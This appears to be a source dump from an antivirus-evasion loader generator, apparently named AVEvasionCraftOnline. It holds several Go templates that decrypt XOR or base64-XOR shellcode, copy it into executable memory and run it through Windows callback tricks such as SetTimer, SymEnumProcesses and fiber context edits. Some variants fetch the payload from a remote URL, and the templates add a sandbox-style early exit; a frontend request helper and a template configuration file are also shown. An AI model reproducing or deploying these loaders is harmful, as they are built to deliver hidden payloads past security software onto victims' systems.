-------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/LOCAL/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | FALSE = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 27 | SymInitialize = Dbghelp.NewProc("SymInitialize") 28 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | Proces, _, _ := GetCurrentProcess.Call() 39 | SymInitialize.Call(Proces, 0, FALSE) 40 | SymEnumProcesses.Call(addr, 0) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func main() { 62 | args := os.Args[0] 63 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 64 | os.Exit(0) 65 | } 66 | 67 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 68 | if err != nil { 69 | return 70 | } 71 | byteData := DecryptData(string(ciphertext)) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/LOCAL/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | type MSG struct { 16 | } 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | dummy = 0 24 | ) 25 | 26 | var ( 27 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 28 | ntdll = syscall.NewLazyDLL("ntdll.dll") 29 | User32 = syscall.NewLazyDLL("User32.dll") 30 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 31 | SetTimer = User32.NewProc("SetTimer") 32 | GetMessageW = User32.NewProc("GetMessageW") 33 | DispatchMessageW = User32.NewProc("DispatchMessageW") 34 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 35 | ) 36 | 37 | func Callback(shellcode []byte) { 38 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | msg := MSG{} 41 | SetTimer.Call(NULL, dummy, NULL, addr) 42 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 43 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 44 | } 45 | 46 | func XorDecrypt(plaintext []byte, key []byte) []byte { 47 | ciphertext := make([]byte, len(plaintext)) 48 | keyLength := len(key) 49 | for i, byte := range plaintext { 50 | keyByte := key[i%keyLength] 51 | encryptedByte := byte ^ keyByte 52 | ciphertext[i] = encryptedByte 53 | } 54 | return ciphertext 55 | } 56 | 57 | func DecryptData(v2 string) []byte { 58 | key := []byte{{{Key}}} 59 | v22, _ := base64.StdEncoding.DecodeString(v2) 60 | v222 := XorDecrypt(v22, key) 61 | return v222 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 71 | if err != nil { 72 | return 73 | } 74 | byteData := DecryptData(string(ciphertext)) 75 | Callback(byteData) 76 | } 77 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/REMOTE/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | dummy [522]byte 15 | ) 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | RESOURCE_ENUM_VALIDATE = 0x0008 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 30 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | 38 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 39 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 40 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func fetchShellcode(url string) []byte { 62 | _, body, _ := fasthttp.Get(nil, url) 63 | return body 64 | } 65 | 66 | func main() { 67 | args := os.Args[0] 68 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 69 | os.Exit(0) 70 | } 71 | 72 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 73 | byteData := DecryptData(string(ciphertext)) 74 | Callback(byteData) 75 | } 76 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/REMOTE/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | FALSE = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 28 | SymInitialize = Dbghelp.NewProc("SymInitialize") 29 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | if err != nil && err.Error() != "The operation completed successfully." { 36 | syscall.Exit(0) 37 | } 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | Proces, _, _ := GetCurrentProcess.Call() 40 | SymInitialize.Call(Proces, 0, FALSE) 41 | SymEnumProcesses.Call(addr, 0) 42 | } 43 | 44 | func XorDecrypt(plaintext []byte, key []byte) []byte { 45 | ciphertext := make([]byte, len(plaintext)) 46 | keyLength := len(key) 47 | for i, byte := range plaintext { 48 | keyByte := key[i%keyLength] 49 | encryptedByte := byte ^ keyByte 50 | ciphertext[i] = encryptedByte 51 | } 52 | return ciphertext 53 | } 54 | 55 | func DecryptData(shellcode []byte) []byte { 56 | key := []byte{{{Key}}} 57 | decryptShellcode := XorDecrypt(shellcode, key) 58 | return decryptShellcode 59 | } 60 | 61 | func fetchShellcode(url string) []byte { 62 | _, body, _ := fasthttp.Get(nil, url) 63 | return body 64 | } 65 | 66 | func main() { 67 | args := os.Args[0] 68 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 69 | os.Exit(0) 70 | } 71 | 72 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 73 | byteData := DecryptData(ciphertext) 74 | Callback(byteData) 75 | } 76 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/REMOTE/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | type MSG struct { 17 | } 18 | 19 | const ( 20 | MEM_COMMIT = 0x1000 21 | MEM_RESERVE = 0x2000 22 | PAGE_EXECUTE_READWRITE = 0x40 23 | NULL = 0 24 | dummy = 0 25 | ) 26 | 27 | var ( 28 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 29 | ntdll = syscall.NewLazyDLL("ntdll.dll") 30 | User32 = syscall.NewLazyDLL("User32.dll") 31 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 32 | SetTimer = User32.NewProc("SetTimer") 33 | GetMessageW = User32.NewProc("GetMessageW") 34 | DispatchMessageW = User32.NewProc("DispatchMessageW") 35 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 36 | ) 37 | 38 | func Callback(shellcode []byte) { 39 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 40 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 41 | msg := MSG{} 42 | SetTimer.Call(NULL, dummy, NULL, addr) 43 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 44 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 45 | } 46 | 47 | func XorDecrypt(plaintext []byte, key []byte) []byte { 48 | ciphertext := make([]byte, len(plaintext)) 49 | keyLength := len(key) 50 | for i, byte := range plaintext { 51 | keyByte := key[i%keyLength] 52 | encryptedByte := byte ^ keyByte 53 | ciphertext[i] = encryptedByte 54 | } 55 | return ciphertext 56 | } 57 | 58 | func DecryptData(shellcode []byte) []byte { 59 | key := []byte{{{Key}}} 60 | decryptShellcode := XorDecrypt(shellcode, key) 61 | return decryptShellcode 62 | } 63 | 64 | func fetchShellcode(url string) []byte { 65 | _, body, _ := fasthttp.Get(nil, url) 66 | return body 67 | } 68 | 69 | func main() { 70 | args := os.Args[0] 71 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 72 | os.Exit(0) 73 | } 74 | 75 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 76 | byteData := DecryptData(ciphertext) 77 | Callback(byteData) 78 | } 79 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/REMOTE/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | FALSE = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 29 | SymInitialize = Dbghelp.NewProc("SymInitialize") 30 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | if err != nil && err.Error() != "The operation completed successfully." { 37 | syscall.Exit(0) 38 | } 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | Proces, _, _ := GetCurrentProcess.Call() 41 | SymInitialize.Call(Proces, 0, FALSE) 42 | SymEnumProcesses.Call(addr, 0) 43 | } 44 | 45 | func XorDecrypt(plaintext []byte, key []byte) []byte { 46 | ciphertext := make([]byte, len(plaintext)) 47 | keyLength := len(key) 48 | for i, byte := range plaintext { 49 | keyByte := key[i%keyLength] 50 | encryptedByte := byte ^ keyByte 51 | ciphertext[i] = encryptedByte 52 | } 53 | return ciphertext 54 | } 55 | 56 | func DecryptData(v2 string) []byte { 57 | key := []byte{{{Key}}} 58 | v22, _ := base64.StdEncoding.DecodeString(v2) 59 | v222 := XorDecrypt(v22, key) 60 | return v222 61 | } 62 | 63 | func fetchShellcode(url string) []byte { 64 | _, body, _ := fasthttp.Get(nil, url) 65 | return body 66 | } 67 | 68 | func main() { 69 | args := os.Args[0] 70 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 71 | os.Exit(0) 72 | } 73 | 74 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 75 | byteData := DecryptData(string(ciphertext)) 76 | Callback(byteData) 77 | } 78 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/REMOTE/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | g_InitOnce [0]byte 14 | lpContext [0]byte 15 | ) 16 | 17 | type MSG struct { 18 | } 19 | 20 | const ( 21 | MEM_COMMIT = 0x1000 22 | MEM_RESERVE = 0x2000 23 | PAGE_EXECUTE_READWRITE = 0x40 24 | NULL = 0 25 | dummy = 0 26 | ) 27 | 28 | var ( 29 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 30 | ntdll = syscall.NewLazyDLL("ntdll.dll") 31 | User32 = syscall.NewLazyDLL("User32.dll") 32 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 33 | SetTimer = User32.NewProc("SetTimer") 34 | GetMessageW = User32.NewProc("GetMessageW") 35 | DispatchMessageW = User32.NewProc("DispatchMessageW") 36 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 37 | ) 38 | 39 | func Callback(shellcode []byte) { 40 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 41 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 42 | msg := MSG{} 43 | SetTimer.Call(NULL, dummy, NULL, addr) 44 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 45 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 46 | } 47 | 48 | func XorDecrypt(plaintext []byte, key []byte) []byte { 49 | ciphertext := make([]byte, len(plaintext)) 50 | keyLength := len(key) 51 | for i, byte := range plaintext { 52 | keyByte := key[i%keyLength] 53 | encryptedByte := byte ^ keyByte 54 | ciphertext[i] = encryptedByte 55 | } 56 | return ciphertext 57 | } 58 | 59 | func DecryptData(v2 string) []byte { 60 | key := []byte{{{Key}}} 61 | v22, _ := base64.StdEncoding.DecodeString(v2) 62 | v222 := XorDecrypt(v22, key) 63 | return v222 64 | } 65 | 66 | func fetchShellcode(url string) []byte { 67 | _, body, _ := fasthttp.Get(nil, url) 68 | return body 69 | } 70 | 71 | func main() { 72 | args := os.Args[0] 73 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 74 | os.Exit(0) 75 | } 76 | 77 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 78 | byteData := DecryptData(string(ciphertext)) 79 | Callback(byteData) 80 | } 81 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/EMBEDDED/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | CreateFiber = kernel32.NewProc("CreateFiber") 27 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 28 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func dummy() { 33 | var age string 34 | fmt.Scanln(&age) 35 | } 36 | 37 | func Callback(shellcode []byte) { 38 | var d func() 39 | d = dummy 40 | ConvertThreadToFiber.Call(NULL) 41 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 42 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 43 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 44 | if lpFiber == NULL { 45 | fmt.Printf("GLE : %d\n", err1) 46 | os.Exit(0) 47 | } 48 | 49 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 50 | *tgtFuncAddr = addr 51 | fmt.Println(tgtFuncAddr) 52 | SwitchToFiber.Call(lpFiber) 53 | } 54 | 55 | func XorDecrypt(plaintext []byte, key []byte) []byte { 56 | ciphertext := make([]byte, len(plaintext)) 57 | keyLength := len(key) 58 | for i, byte := range plaintext { 59 | keyByte := key[i%keyLength] 60 | encryptedByte := byte ^ keyByte 61 | ciphertext[i] = encryptedByte 62 | } 63 | return ciphertext 64 | } 65 | 66 | func DecryptData(shellcode []byte) []byte { 67 | key := []byte{{{Key}}} 68 | decryptShellcode := XorDecrypt(shellcode, key) 69 | return decryptShellcode 70 | } 71 | 72 | func main() { 73 | args := os.Args[0] 74 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 75 | os.Exit(0) 76 | } 77 | 78 | ciphertext := []byte{{{Shellcode}}} 79 | byteData := DecryptData(ciphertext) 80 | Callback(byteData) 81 | } 82 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/utils/request.js: -------------------------------------------------------------------------------- 1 | import axios from 'axios' 2 | import { ElMessage } from 'element-plus' 3 | import store from '../store' 4 | import { getToken } from './auth.js' 5 | 6 | // 创建axios实例 7 | const service = axios.create({ 8 | baseURL: import.meta.env.VITE_BASE_API, // url = base url + request url 9 | withCredentials: true, // send cookies when cross-domain requests 10 | timeout: 15000 // request timeout 11 | }) 12 | 13 | // 请求拦截 14 | service.interceptors.request.use( 15 | config => { 16 | // do something before request is sent 17 | 18 | if (store.getters.token) { 19 | // 让每个请求携带令牌 20 | // ['X-Token'] is a custom headers key 21 | // please modify it according to the actual situation 22 | config.headers['BBS-Token'] = getToken() 23 | } 24 | return config 25 | }, 26 | error => { 27 | // do something with request error 28 | console.log(error) // for debug 29 | return Promise.reject(error) 30 | } 31 | ) 32 | 33 | // 响应拦截 34 | service.interceptors.response.use( 35 | response => { 36 | const res = response 37 | return res 38 | /* if (res.code !== 200) { 39 | ElMessage({ 40 | message: res.message || '请求错误', 41 | type: 'error', 42 | duration: 5 * 1000 43 | }) 44 | 45 | // 50008: Illegal token; 50012: Other clients logged in; 50014: Token expired; 46 | if (res.code === 50008 || res.code === 50012 || res.code === 50014) { 47 | // 重新登录 48 | ElMessageBox.confirm( 49 | 'You have been logged out, you can cancel to stay on this page, or log in again', 50 | '确认注销', 51 | { 52 | confirmButtonText: '重新登录', 53 | cancelButtonText: '取消', 54 | type: 'warning' 55 | } 56 | ).then(() => { 57 | store.dispatch('user/resetToken').then(() => { 58 | location.reload() 59 | }) 60 | }) 61 | } 62 | return Promise.reject(new Error(res.message || '请求错误')) 63 | } else { 64 | return res 65 | }*/ 66 | }, 67 | error => { 68 | console.log('err' + error) // for debug 69 | ElMessage({ 70 | message: error.message, 71 | type: 'error', 72 | duration: 5 * 1000 73 | }) 74 | return Promise.reject(error) 75 | } 76 | ) 77 | 78 | export default service 79 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/EMBEDDED/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | CreateFiber = kernel32.NewProc("CreateFiber") 28 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 29 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func dummy() { 34 | var age string 35 | fmt.Scanln(&age) 36 | } 37 | 38 | func Callback(shellcode []byte) { 39 | var d func() 40 | d = dummy 41 | ConvertThreadToFiber.Call(NULL) 42 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 43 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 44 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 45 | if lpFiber == NULL { 46 | fmt.Printf("GLE : %d\n", err1) 47 | os.Exit(0) 48 | } 49 | 50 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 51 | *tgtFuncAddr = addr 52 | fmt.Println(tgtFuncAddr) 53 | SwitchToFiber.Call(lpFiber) 54 | } 55 | 56 | func XorDecrypt(plaintext []byte, key []byte) []byte { 57 | ciphertext := make([]byte, len(plaintext)) 58 | keyLength := len(key) 59 | for i, byte := range plaintext { 60 | keyByte := key[i%keyLength] 61 | encryptedByte := byte ^ keyByte 62 | ciphertext[i] = encryptedByte 63 | } 64 | return ciphertext 65 | } 66 | 67 | func DecryptData(v2 string) []byte { 68 | key := []byte{{{Key}}} 69 | v22, _ := base64.StdEncoding.DecodeString(v2) 70 | v222 := XorDecrypt(v22, key) 71 | return v222 72 | } 73 | 74 | func main() { 75 | args := os.Args[0] 76 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 77 | os.Exit(0) 78 | } 79 | 80 | ciphertext := "{{Shellcode}}" 81 | byteData := DecryptData(ciphertext) 82 | Callback(byteData) 83 | } 84 | -------------------------------------------------------------------------------- /application.yaml: -------------------------------------------------------------------------------- 1 | bypassav: 2 | templates-directory: D:/AVEvasionCraftOnline/template 3 | storage-directory: D:/AVEvasionCraftOnline/download 4 | compilerwork-directory: D:/AVEvasionCraftOnline/compiler 5 | templates-mapping: 6 | go_VirtualAlloc: 7 | loadMethod: 8 | - EMBEDDED 9 | - REMOTE 10 | - LOCAL 11 | transformation: 12 | - base64Xor 13 | - xor 14 | 15 | go_CertEnumSystemStore: 16 | loadMethod: 17 | - EMBEDDED 18 | - REMOTE 19 | - LOCAL 20 | transformation: 21 | - base64Xor 22 | - xor 23 | 24 | go_EnumChildWindows: 25 | loadMethod: 26 | - EMBEDDED 27 | - REMOTE 28 | - LOCAL 29 | transformation: 30 | - base64Xor 31 | - xor 32 | 33 | go_EnumFontsW: 34 | loadMethod: 35 | - EMBEDDED 36 | - REMOTE 37 | - LOCAL 38 | transformation: 39 | - base64Xor 40 | - xor 41 | 42 | go_EnumResourceTypesExW: 43 | loadMethod: 44 | - EMBEDDED 45 | - REMOTE 46 | - LOCAL 47 | transformation: 48 | - base64Xor 49 | - xor 50 | 51 | go_FiberContextEdit: 52 | loadMethod: 53 | - EMBEDDED 54 | - REMOTE 55 | - LOCAL 56 | transformation: 57 | - base64Xor 58 | - xor 59 | 60 | go_FlsAlloc: 61 | loadMethod: 62 | - EMBEDDED 63 | - REMOTE 64 | - LOCAL 65 | transformation: 66 | - base64Xor 67 | - xor 68 | 69 | go_SetTimer: 70 | loadMethod: 71 | - EMBEDDED 72 | - REMOTE 73 | - LOCAL 74 | transformation: 75 | - base64Xor 76 | - xor 77 | 78 | go_SymEnumProcesses: 79 | loadMethod: 80 | - EMBEDDED 81 | - REMOTE 82 | - LOCAL 83 | transformation: 84 | - base64Xor 85 | - xor 86 | 87 | nim_VirtualAlloc: 88 | loadMethod: 89 | - EMBEDDED 90 | - LOCAL 91 | transformation: 92 | - xor 93 | 94 | c_VirtualAlloc: 95 | loadMethod: 96 | - EMBEDDED 97 | transformation: 98 | - none 99 | compiler-c: x86_64-w64-mingw32-gcc 100 | compiler-nim: nim 101 | compiler-golang: go 102 | 103 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/LOCAL/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | CreateFiber = kernel32.NewProc("CreateFiber") 27 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 28 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func dummy() { 33 | var age string 34 | fmt.Scanln(&age) 35 | } 36 | 37 | func Callback(shellcode []byte) { 38 | var d func() 39 | d = dummy 40 | ConvertThreadToFiber.Call(NULL) 41 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 42 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 43 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 44 | if lpFiber == NULL { 45 | fmt.Printf("GLE : %d\n", err1) 46 | os.Exit(0) 47 | } 48 | 49 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 50 | *tgtFuncAddr = addr 51 | fmt.Println(tgtFuncAddr) 52 | SwitchToFiber.Call(lpFiber) 53 | } 54 | 55 | func XorDecrypt(plaintext []byte, key []byte) []byte { 56 | ciphertext := make([]byte, len(plaintext)) 57 | keyLength := len(key) 58 | for i, byte := range plaintext { 59 